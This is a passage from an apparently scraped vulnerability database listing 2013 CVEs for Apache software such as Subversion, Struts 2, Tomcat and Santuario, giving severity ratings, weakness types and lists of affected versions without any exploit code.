ibm websphere_application_server 3.0.0.3
CVE-2013-1814 MEDIUM

The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache rave 0.16
apache rave 0.19
apache rave 0.17
apache rave 0.12
apache rave 0.20
apache rave 0.14
apache rave 0.13
apache rave 0.15
apache rave 0.11
apache rave 0.18
CVE-2013-1845 LOW

The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.

CVSS 2.0

Severity: LOW

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.6.18
opensuse opensuse 12.1
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.6.6
apache subversion 1.6.11
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
apache subversion 1.7.4
apache subversion 1.6.17
apache subversion 1.7.1
apache subversion 1.6.7
apache subversion 1.6.10
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
opensuse opensuse 12.3
apache subversion 1.6.1
apache subversion 1.6.13
apache subversion 1.6.3
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.6.5
opensuse opensuse 12.2
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
CVE-2013-1846 MEDIUM

The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.6.18
opensuse opensuse 12.1
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.6.6
apache subversion 1.6.11
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
apache subversion 1.7.4
apache subversion 1.6.17
apache subversion 1.7.1
apache subversion *
apache subversion 1.6.7
apache subversion 1.6.10
apache subversion 1.7.5
apache subversion 1.6.12
opensuse opensuse 12.3
apache subversion 1.6.1
apache subversion 1.6.13
apache subversion 1.6.3
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.6.5
opensuse opensuse 12.2
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
CVE-2013-1847 MEDIUM

The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.6.18
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.6.6
apache subversion 1.6.11
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
apache subversion 1.7.4
apache subversion 1.6.17
apache subversion 1.7.1
apache subversion 1.6.7
apache subversion 1.6.10
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
apache subversion 1.6.1
apache subversion 1.6.13
apache subversion 1.6.3
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.6.5
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
CVE-2013-1849 MEDIUM

The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.6.18
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.6.6
apache subversion 1.6.11
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
apache subversion 1.7.4
apache subversion 1.6.17
apache subversion 1.7.1
apache subversion 1.6.7
apache subversion 1.6.10
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
apache subversion 1.6.1
apache subversion 1.6.13
apache subversion 1.6.3
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.6.5
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
CVE-2013-1862 MEDIUM

mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
redhat jboss_enterprise_application_platform 6.0.0
redhat enterprise_linux_server_aus 6.4
oracle http_server 11.1.1.7.0
redhat enterprise_linux_eus 6.4
oracle http_server 12.1.3.0
canonical ubuntu_linux 12.04
opensuse opensuse 11.4
redhat enterprise_linux_server 6.0
redhat jboss_enterprise_application_platform 6.4.0
canonical ubuntu_linux 12.10
canonical ubuntu_linux 13.04
oracle http_server 12.1.2.0
redhat enterprise_linux_eus 5.9
redhat enterprise_linux_desktop 5.0
canonical ubuntu_linux 10.04
redhat enterprise_linux_server_aus 5.9
redhat enterprise_linux_desktop 6.0
opensuse opensuse 12.3
redhat enterprise_linux_workstation 5.0
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server 5.0
opensuse opensuse 12.2
oracle http_server 10.1.3.5.0
CVE-2013-1879 MEDIUM

Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq *
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.5.1
apache activemq 5.7.0
apache activemq 5.2.0
apache activemq 5.4.1
CVE-2013-1880 MEDIUM

Cross-site scripting (XSS) vulnerability in the Portfolio publisher servlet in the demo web application in Apache ActiveMQ before 5.9.0 allows remote attackers to inject arbitrary web script or HTML via the refresh parameter to demo/portfolioPublish, a different vulnerability than CVE-2012-6092.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq *
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.5.1
apache activemq 5.7.0
apache activemq 5.2.0
apache activemq 5.4.1
CVE-2013-1884 MEDIUM

The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.7.1
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.7.6
apache subversion 1.7.5
apache subversion 1.7.4
apache subversion 1.7.7
CVE-2013-1896 MEDIUM

mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
redhat enterprise_linux_eus 5.9
apache http_server *
redhat enterprise_linux_desktop 5.0
redhat jboss_enterprise_application_platform 6.0.0
canonical ubuntu_linux 10.04
redhat enterprise_linux_server_aus 6.4
redhat enterprise_linux_server_aus 5.9
redhat enterprise_linux_eus 6.4
redhat enterprise_linux_desktop 6.0
canonical ubuntu_linux 12.04
opensuse opensuse 12.3
opensuse opensuse 11.4
redhat enterprise_linux_workstation 5.0
redhat enterprise_linux_server 6.0
redhat jboss_enterprise_application_platform 6.4.0
redhat enterprise_linux_workstation 6.0
canonical ubuntu_linux 12.10
redhat enterprise_linux_server 5.0
opensuse opensuse 12.2
canonical ubuntu_linux 13.04
CVE-2013-1909 MEDIUM

The Python client in Apache Qpid before 2.2 does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
redhat enterprise_mrg 2.0
apache qpid 0.10
apache qpid 0.17
apache qpid *
apache qpid 0.12
apache qpid 0.18
apache qpid 0.14
apache qpid 0.15
apache qpid 0.19
apache qpid 0.9
apache qpid 0.7
apache qpid 0.8
apache qpid 0.5
apache qpid 0.6
apache qpid 0.16
apache qpid 0.11
apache qpid 0.13
CVE-2013-1965 HIGH

Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache struts *
apache struts2-showcase *
CVE-2013-1966 HIGH

Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache struts *
CVE-2013-1968 MEDIUM

Subversion before 1.6.23 and 1.7.x before 1.7.10 allows remote authenticated users to cause a denial of service (FSFS repository corruption) via a newline character in a file name.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.6.18
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.6.6
apache subversion 1.6.11
canonical ubuntu_linux 12.04
opensuse opensuse 11.4
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
canonical ubuntu_linux 12.10
apache subversion 1.7.9
canonical ubuntu_linux 13.04
apache subversion 1.7.4
apache subversion 1.6.17
apache subversion 1.7.1
apache subversion *
apache subversion 1.6.7
apache subversion 1.6.10
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
apache subversion 1.6.1
apache subversion 1.6.13
collabnet subversion 1.6.17
apache subversion 1.6.3
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.6.5
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
CVE-2013-2055 MEDIUM

Unspecified vulnerability in Apache Wicket 1.4.x before 1.4.23, 1.5.x before 1.5.11, and 6.x before 6.8.0 allows remote attackers to obtain sensitive information via vectors that cause raw HTML templates to be rendered without being processed and reading the information that is outside of wicket:panel markup.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache wicket 6.8.0
apache wicket 1.4.20
apache wicket 1.4.15
apache wicket 1.4.16
apache wicket 6.2.0
apache wicket 1.4.12
apache wicket 1.4.22
apache wicket 1.5.9
apache wicket 6.1.1
apache wicket 6.4.0
apache wicket 1.4.0
apache wicket 1.5.4
apache wicket 1.4.14
apache wicket 1.4.1
apache wicket 1.4.13
apache wicket 1.4.11
apache wicket 1.5.1
apache wicket 1.5.8
apache wicket 1.4.10
apache wicket 1.4.18
apache wicket 1.5.2
apache wicket 1.5.5
apache wicket 6.7.0
apache wicket 6.1.0
apache wicket 6.5.0
apache wicket 6.3.0
apache wicket 6.6.0
apache wicket 1.4.21
apache wicket 1.5.3
apache wicket 1.5.6
apache wicket 1.5.7
apache wicket 1.5.10
apache wicket 1.4.17
apache wicket 1.5.0
apache wicket 1.4.19
CVE-2013-2067 MEDIUM

java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 7.0.13
apache tomcat 6.0.33
apache tomcat 7.0.15
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 6.0.26
apache tomcat 6.0.29
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.21
apache tomcat 7.0.28
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 7.0.21
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 6.0.36
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.8
apache tomcat 7.0.17
apache tomcat 7.0.2
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.24
apache tomcat 7.0.5
apache tomcat 7.0.22
apache tomcat 7.0.0
apache tomcat 7.0.30
apache tomcat 7.0.32
apache tomcat 6.0.35
CVE-2013-2071 LOW

java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 7.0.25
apache tomcat 7.0.13
apache tomcat 7.0.15
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 7.0.12
apache tomcat 7.0.20
apache tomcat 7.0.28
apache tomcat 7.0.14
apache tomcat 7.0.21
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.3
apache tomcat 7.0.8
apache tomcat 7.0.17
apache tomcat 7.0.2
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.5
apache tomcat 7.0.22
apache tomcat 7.0.0
apache tomcat 7.0.30
apache tomcat 7.0.32
CVE-2013-2088 HIGH

contrib/hook-scripts/svn-keyword-check.pl in Subversion before 1.6.23 allows remote authenticated users with commit permissions to execute arbitrary commands via shell metacharacters in a filename.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache subversion 1.6.18
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.6.6
apache subversion 1.6.11
opensuse opensuse 11.4
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.6.19
apache subversion 1.6.17
apache subversion *
apache subversion 1.6.7
apache subversion 1.6.10
apache subversion 1.6.20
apache subversion 1.6.12
apache subversion 1.6.1
apache subversion 1.6.13
collabnet subversion 1.6.17
apache subversion 1.6.3
apache subversion 1.6.5
apache subversion 1.6.15
apache subversion 1.6.14
CVE-2013-2112 HIGH

The svnserve server in Subversion before 1.6.23 and 1.7.x before 1.7.10 allows remote attackers to cause a denial of service (exit) by aborting a connection.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache subversion 1.7.3
apache subversion 1.6.18
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.6.6
apache subversion 1.6.11
canonical ubuntu_linux 12.04
opensuse opensuse 11.4
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
canonical ubuntu_linux 12.10
apache subversion 1.7.9
canonical ubuntu_linux 13.04
apache subversion 1.7.4
apache subversion 1.6.17
apache subversion 1.7.1
apache subversion *
apache subversion 1.6.7
apache subversion 1.6.10
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
apache subversion 1.6.1
apache subversion 1.6.13
collabnet subversion 1.6.17
apache subversion 1.6.3
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.6.5
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
CVE-2013-2115 HIGH

Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache struts *
CVE-2013-2134 HIGH

Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache struts *
CVE-2013-2135 HIGH

Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache struts *
CVE-2013-2136 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache CloudStack before 4.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) Physical network name to the Zone wizard; (2) New network name, (3) instance name, or (4) group to the Instance wizard; (5) unspecified "multi-edit fields;" and (6) unspecified "list view" edit fields related to global settings.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache cloudstack 2.1.5
apache cloudstack 4.0.0
apache cloudstack 4.0.2
apache cloudstack 2.0.1
apache cloudstack 2.1.10
apache cloudstack 2.2.0
apache cloudstack 2.2.2
apache cloudstack 2.2.5
apache cloudstack 2.2.14
apache cloudstack *
apache cloudstack 2.1.7
apache cloudstack 2.2.1
apache cloudstack 2.2.7
apache cloudstack 2.1.9
apache cloudstack 2.2.6
apache cloudstack 2.2.9
apache cloudstack 2.1.6
apache cloudstack 2.1.0
apache cloudstack 3.0.2
apache cloudstack 3.0.1
apache cloudstack 2.1.8
apache cloudstack 2.1.4
apache cloudstack 3.0.0
apache cloudstack 2.1.3
apache cloudstack 2.2.12
apache cloudstack 2.2.8
apache cloudstack 2.1.2
apache cloudstack 2.1.1
apache cloudstack 2.2.3
apache cloudstack 2.0
apache cloudstack 4.0.1
apache cloudstack 2.2.11
apache cloudstack 2.2.13
CVE-2013-2137 MEDIUM

Cross-site scripting (XSS) vulnerability in the "View Log" screen in the Webtools application in Apache Open For Business Project (aka OFBiz) 10.04.01 through 10.04.05, 11.04.01 through 11.04.02, and 12.04.01 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz 10.04.01
apache ofbiz 10.04.03
apache ofbiz 11.04.01
apache ofbiz 10.04.05
apache ofbiz 10.04.04
apache ofbiz 11.04.02
apache ofbiz 12.04.01
apache ofbiz 10.04.02
CVE-2013-2153 MEDIUM

The XML digital signature functionality (xsec/dsig/DSIGReference.cpp) in Apache Santuario XML Security for C++ (aka xml-security-c) before 1.7.1 allows context-dependent attackers to reuse signatures and spoof arbitrary content via crafted Reference elements in the Signature, aka "XML Signature Bypass issue."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache xml_security_for_c++ 1.1.0
apache xml_security_for_c++ 1.6.0
apache xml_security_for_c++ 0.1.0
apache xml_security_for_c++ 1.3.1
apache xml_security_for_c++ 1.4.0
apache xml_security_for_c++ 1.5.1
apache xml_security_for_c++ *
apache xml_security_for_c++ 1.2.1
apache xml_security_for_c++ 1.2.0
apache xml_security_for_c++ 0.2.0
apache xml_security_for_c++ 1.5.0
apache xml_security_for_c++ 1.6.1
apache xml_security_for_c++ 1.3.0
CVE-2013-2154 HIGH

Stack-based buffer overflow in the XML Signature Reference functionality (xsec/dsig/DSIGReference.cpp) in Apache Santuario XML Security for C++ (aka xml-security-c) before 1.7.1 allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via malformed XPointer expressions, probably related to the DSIGReference::getURIBaseTXFM function.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache xml_security_for_c++ 1.1.0
apache xml_security_for_c++ 1.6.0
apache xml_security_for_c++ 0.1.0
apache xml_security_for_c++ 1.3.1
apache xml_security_for_c++ 1.4.0
apache xml_security_for_c++ 1.5.1
apache xml_security_for_c++ *
apache xml_security_for_c++ 1.2.1
apache xml_security_for_c++ 1.2.0
apache xml_security_for_c++ 0.2.0
apache xml_security_for_c++ 1.5.0
apache xml_security_for_c++ 1.6.1
apache xml_security_for_c++ 1.3.0
CVE-2013-2155 MEDIUM

Apache Santuario XML Security for C++ (aka xml-security-c) before 1.7.1 does not properly validate length values, which allows remote attackers to cause a denial of service or bypass the CVE-2009-0217 protection mechanism and spoof a signature via crafted length values to the (1) compareBase64StringToRaw, (2) DSIGAlgorithmHandlerDefault, or (3) DSIGAlgorithmHandlerDefault::verify functions.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache xml_security_for_c++ 1.1.0
apache xml_security_for_c++ 1.6.0
apache xml_security_for_c++ 0.1.0
apache xml_security_for_c++ 1.3.1
apache xml_security_for_c++ 1.4.0
apache xml_security_for_c++ 1.5.1
apache xml_security_for_c++ *
apache xml_security_for_c++ 1.2.1
apache xml_security_for_c++ 1.2.0
apache xml_security_for_c++ 0.2.0
apache xml_security_for_c++ 1.5.0
apache xml_security_for_c++ 1.6.1
apache xml_security_for_c++ 1.3.0
CVE-2013-2156 HIGH

Heap-based buffer overflow in the Exclusive Canonicalization functionality (xsec/canon/XSECC14n20010315.cpp) in Apache Santuario XML Security for C++ (aka xml-security-c) before 1.7.1 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted PrefixList attribute.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache xml_security_for_c++ 1.1.0
apache xml_security_for_c++ 1.6.0
apache xml_security_for_c++ 0.1.0
apache xml_security_for_c++ 1.3.1
apache xml_security_for_c++ 1.4.0
apache xml_security_for_c++ 1.5.1
apache xml_security_for_c++ *
apache xml_security_for_c++ 1.2.1
apache xml_security_for_c++ 1.2.0
apache xml_security_for_c++ 0.2.0
apache xml_security_for_c++ 1.5.0
apache xml_security_for_c++ 1.6.1
apache xml_security_for_c++ 1.3.0
CVE-2013-2160 MEDIUM

The streaming XML parser in Apache CXF 2.5.x before 2.5.10, 2.6.x before 2.6.7, and 2.7.x before 2.7.4 allows remote attackers to cause a denial of service (CPU and memory consumption) via crafted XML with a large number of (1) elements, (2) attributes, (3) nested constructs, and possibly other vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.5.8
apache cxf 2.6.3
apache cxf 2.6.6
apache cxf 2.6.0
apache cxf 2.6.4
apache cxf 2.5.0
apache cxf 2.5.5
apache cxf 2.5.6
apache cxf 2.6.5
apache cxf 2.5.3
apache cxf 2.6.1
apache cxf 2.7.1
apache cxf 2.5.9
apache cxf 2.5.1
apache cxf 2.5.4
apache cxf 2.6.2
apache cxf 2.5.2
apache cxf 2.5.7
apache cxf 2.7.3
apache cxf 2.7.2
CVE-2013-2172 MEDIUM

jcp/xml/dsig/internal/dom/DOMCanonicalizationMethod.java in Apache Santuario XML Security for Java 1.4.x before 1.4.8 and 1.5.x before 1.5.5 allows context-dependent attackers to spoof an XML Signature by using the CanonicalizationMethod parameter to specify an arbitrary weak "canonicalization algorithm to apply to the SignedInfo part of the Signature."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache santuario_xml_security_for_java 1.5.2
apache xml_security_for_java 1.5.1
apache xml_security_for_java 1.4.7
apache xml_security_for_java 1.5.0
apache xml_security_for_java 1.5.4
apache santuario_xml_security_for_java 1.5.3
apache xml_security_for_java 1.5.3
apache santuario_xml_security_for_java 1.5.1
apache xml_security_for_java 1.5.2
apache santuario_xml_security_for_java 1.4.7
apache santuario_xml_security_for_java 1.5.4
apache santuario_xml_security_for_java 1.5.0
CVE-2013-2185 HIGH

The readObject method in the DiskFileItem class in Apache Tomcat and JBoss Web, as used in Red Hat JBoss Enterprise Application Platform 6.1.0 and Red Hat JBoss Portal 6.0.0, allows remote attackers to write to arbitrary files via a NULL byte in a file name in a serialized instance, a similar issue to CVE-2013-2186. NOTE: this issue is reportedly disputed by the Apache Tomcat team, although Red Hat considers it a vulnerability. The dispute appears to regard whether it is the responsibility of applications to avoid providing untrusted data to be deserialized, or whether this class should inherently protect against this issue

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat *
redhat jboss_enterprise_application_platform 6.1.0
redhat jboss_enterprise_portal_platform 6.0.0
CVE-2013-2187 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Archiva 1.2 through 1.2.2 and 1.3 before 1.3.8 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters, related to the home page.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache archiva 1.3.1
apache archiva 1.3.5
apache archiva 1.3
apache archiva 1.2
apache archiva 1.2.1
apache archiva 1.3.4
apache archiva 1.2.2
apache archiva 1.3.3
apache archiva 1.3.6
apache archiva 1.3.2
CVE-2013-2189 MEDIUM

Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2013-2192 LOW

The RPC protocol implementation in Apache Hadoop 2.x before 2.0.6-alpha, 0.23.x before 0.23.9, and 1.x before 1.2.1, when the Kerberos security features are enabled, allows man-in-the-middle attackers to disable bidirectional authentication and obtain sensitive information by forcing a downgrade to simple authentication.

CVSS 2.0

Severity: LOW

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache hadoop 0.23.5
apache hadoop 2.0.5
apache hadoop 0.23.4
apache hadoop 0.23.3
apache hadoop 1.0.1
apache hadoop 1.0.2
apache hadoop 2.0.2
apache hadoop 0.23.8
apache hadoop 1.1.2
apache hadoop 2.0.4
apache hadoop 1.0.4
apache hadoop 1.0.3
apache hadoop 0.23.7
apache hadoop 2.0.0
apache hadoop 1.1.1
apache hadoop 0.23.0
apache hadoop 2.0.3
apache hadoop 1.1.0
apache hadoop 1.2.0
apache hadoop 0.23.1
apache hadoop 2.0.1
apache hadoop 0.23.6
apache hadoop 1.0.0
CVE-2013-2193 MEDIUM

Apache HBase 0.92.x before 0.92.3 and 0.94.x before 0.94.9, when the Kerberos features are enabled, allows man-in-the-middle attackers to disable bidirectional authentication and obtain sensitive information via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache hbase 0.94.3
apache hbase 0.94.4
apache hbase 0.92.0
apache hbase 0.94.6.1
apache hbase 0.94.0
apache hbase 0.94.6
apache hbase 0.94.7
apache hbase 0.94.5
apache hbase 0.92.1
apache hbase 0.94.8
apache hbase 0.94.1
apache hbase 0.92.2
apache hbase 0.94.2
CVE-2013-2210 HIGH

Heap-based buffer overflow in the XML Signature Reference functionality in Apache Santuario XML Security for C++ (aka xml-security-c) before 1.7.2 allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via malformed XPointer expressions. NOTE: this is due to an incorrect fix for CVE-2013-2154.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache xml_security_for_c++ 1.1.0
apache xml_security_for_c++ 1.6.0
apache xml_security_for_c++ 0.1.0
apache xml_security_for_c++ 1.3.1
apache xml_security_for_c++ 1.7.0
apache xml_security_for_c++ 1.4.0
apache xml_security_for_c++ 1.5.1
apache xml_security_for_c++ *
apache xml_security_for_c++ 1.2.1
apache xml_security_for_c++ 1.2.0
apache xml_security_for_c++ 0.2.0
apache xml_security_for_c++ 1.5.0
apache xml_security_for_c++ 1.6.1
apache xml_security_for_c++ 1.3.0
CVE-2013-2248 MEDIUM

Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
